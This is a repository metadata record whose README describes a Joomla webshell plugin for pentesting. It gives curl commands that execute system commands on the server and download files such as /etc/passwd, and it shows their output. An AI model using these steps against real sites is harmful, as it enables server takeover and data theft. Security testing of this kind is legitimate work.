{"id":17995089,"url":"https://github.com/p0dalirius/joomla-webshell-plugin","last_synced_at":"2025-09-03T16:32:59.599Z","repository":{"id":41381966,"uuid":"495051168","full_name":"p0dalirius/Joomla-webshell-plugin","owner":"p0dalirius","description":"A webshell plugin and interactive shell for pentesting a Joomla website. ","archived":false,"fork":false,"pushed_at":"2022-05-23T12:53:15.000Z","size":3288,"stargazers_count":43,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"master","last_synced_at":"2024-12-18T18:50:10.245Z","etag":null,"topics":["extension","joomla","pentest","plugin","rce","webshell"],"latest_commit_sha":null,"homepage":"https://podalirius.net/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/p0dalirius.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":"p0dalirius","patreon":"Podalirius"}},"created_at":"2022-05-22T12:17:18.000Z","updated_at":"2024-11-08T15:01:00.000Z","dependencies_parsed_at":"2022-07-19T02:04:24.595Z","dependency_job_id":null,"html_url":"https://github.com/p0dalirius/Joomla-webshell-plugin","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FJoomla-webshell-plugin","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FJoomla-webshell-plugin/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FJoomla-webshell-plugin/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FJoomla-webshell-plugin/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/p0dalirius","download_url":"https://codeload.github.com/p0dalirius/Joomla-webshell-plugin/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":231903902,"owners_count":18443578,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["extension","joomla","pentest","plugin","rce","webshell"],"created_at":"2024-10-29T20:17:54.199Z","updated_at":"2024-12-30T19:24:21.900Z","avatar_url":"https://github.com/p0dalirius.png","language":"Python","readme":"# Joomla webshell plugin for RCE\n\n\u003cp align=\"center\"\u003e\n    A webshell plugin and interactive shell for pentesting a Joomla website.\n    \u003cbr\u003e\n    \u003cimg alt=\"GitHub release (latest by date)\" src=\"https://img.shields.io/github/v/release/p0dalirius/Joomla-webshell-plugin\"\u003e\n    \u003ca href=\"https://twitter.com/intent/follow?screen_name=podalirius_\" title=\"Follow\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/podalirius_?label=Podalirius\u0026style=social\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://www.youtube.com/c/Podalirius_?sub_confirmation=1\" title=\"Subscribe\"\u003e\u003cimg alt=\"YouTube Channel Subscribers\" src=\"https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social\"\u003e\u003c/a\u003e\n    \u003cbr\u003e\n\u003c/p\u003e\n\n## Features\n\n - [x] Webshell plugin for Joomla.\n - [x] Execute system commands via an API with `?action=exec`.\n - [x] Download files from the remote system to your attacking machine with `?action=download`.\n\n## Usage\n\n**Requirements**: You need to have the credentials of the super user account of the Joomla instance.\n\n### Step 1: Upload the webshell plugin\n\nGo to \"System --\u003e Extensions\" page, at http://127.0.0.1:10080/administrator/index.php?option=com_installer\u0026view=install, and click on \"_Upload Package File_\":\n\n![](./.github/upload_and_install.png)\n\n### Step 2.1: Executing commands\n\nYou can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/modules/mod_webshell/mod_webshell.php with `action=exec\u0026cmd=id`:\n\n```sh\n$ curl -X POST 'http://127.0.0.1:10080/modules/mod_webshell/mod_webshell.php' --data \"action=exec\u0026cmd=id\"\n{\"stdout\":\"uid=33(www-data) gid=33(www-data) groups=33(www-data)\\n\",\"stderr\":\"\",\"exec\":\"id\"}\n```\n\nYou can also access it by a GET request from a browser:\n\n![](./.github/exec_code_web.png)\n\n### Step 2.2: Downloading files\n\nYou can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/modules/mod_webshell/mod_webshell.php with `action=download\u0026path=/etc/passwd`:\n\n```sh\n$ curl -X POST 'http://127.0.0.1:10080/modules/mod_webshell/mod_webshell.php' --data \"action=download\u0026path=/etc/passwd\" -o-\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nmysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false\n```\n\nYou can also download a remote file from a browser with a GET request :\n\n![](./.github/download_file_web.png)\n\n### Step 3: The interactive console\n\nWhen your webshell is active, you can now use the interactive [console.py](console.py) to execute commands and download remote files.\n\nhttps://user-images.githubusercontent.com/79218792/169823449-42289f27-70a0-460b-8f40-9cecda55e6f5.mp4\n\n## References\n - https://docs.joomla.org/Special:MyLanguage/J3.x:Creating_a_simple_module/Developing_a_Basic_Module\n - https://docs.joomla.org/J4.x:Creating_a_Simple_Module\n","funding_links":["https://github.com/sponsors/p0dalirius","https://patreon.com/Podalirius"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp0dalirius%2Fjoomla-webshell-plugin","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fp0dalirius%2Fjoomla-webshell-plugin","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp0dalirius%2Fjoomla-webshell-plugin/lists"}